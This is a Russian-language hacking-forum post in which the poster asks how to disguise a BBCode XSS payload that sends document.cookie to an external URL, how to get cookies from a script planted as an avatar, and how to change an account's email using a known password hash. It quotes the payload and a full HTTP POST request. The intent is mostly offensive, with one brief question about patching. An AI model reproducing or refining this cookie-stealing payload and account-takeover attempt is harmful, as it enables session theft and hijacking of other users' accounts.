Возможно эта тема уже изезжена на у меня несколько вопросов и прозьб в помощи советом 1 при попытк вставить XSS : [em**com`=`][/url].com[/email] ` style=`background:url(javas*cript:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+documen*t.cookie);` В опрере выглядит воттак: .com'>[email protected] ` style=`background:url(javascr*ipt:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+do*cument.cookie);` как мне его замаскировать чтобы несветилось так сильно? 2: при подстановки скрипта в качестве аватара комне неприходят куки а просто приходят логи с какого IP адреса заходили и всё Плиз прошу помощи
так же при отсылание этого скрипта в пм он работает на только в ИЕ в опере он палится блин а куки хочется темболее хеш на данной версии форума можно расифровать ведь он без соли
И как эти дырки можно заделать неподскажите ? и можно ли как небуть сменить мыло незная параля но зная хеш?
Проверка паса стоит но я пытался поменять при помощи http заголовка отправить: POST /forums/index.php? HTTP/1.0 User-Agent: Opera/9.02 (Windows NT 5.1; U; ru) Host: site.net Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Referer: http://site.net/forums/index.php?act=UserCP&CODE=08 Cookie: forum_read=a%3A1%3A%7Bi%3A15%3Bi%3A1163 497321%3B%7D; anonlogin=-1; member_id=1061; pass_hash=5f3249aa304055d63828af3bfab778f6; session_id=92af66c5aa31faf222e6a87af24e004a Cookie2: $Version=1 Content-Length: 201 Content-Type: application/x-www-form-urlencoded Connection: Keep-Alive act=UserCP&CODE=09&in_email_1=qwe%40rt.er&in _email_2=qwe%40rt.er&password=123®id=c04 06f65bd1257ba6ab5d8c79d780650®_code= 143102&change_email=%D1%EE%F5%F0%E0%ED %E8%F2%FC+%E8%E7%EC%E5%ED%E5%ED%E8%FF думал вместо password=123 вставить известный мне хеш , непрокатило извиняюсь за ламерство но попытка....
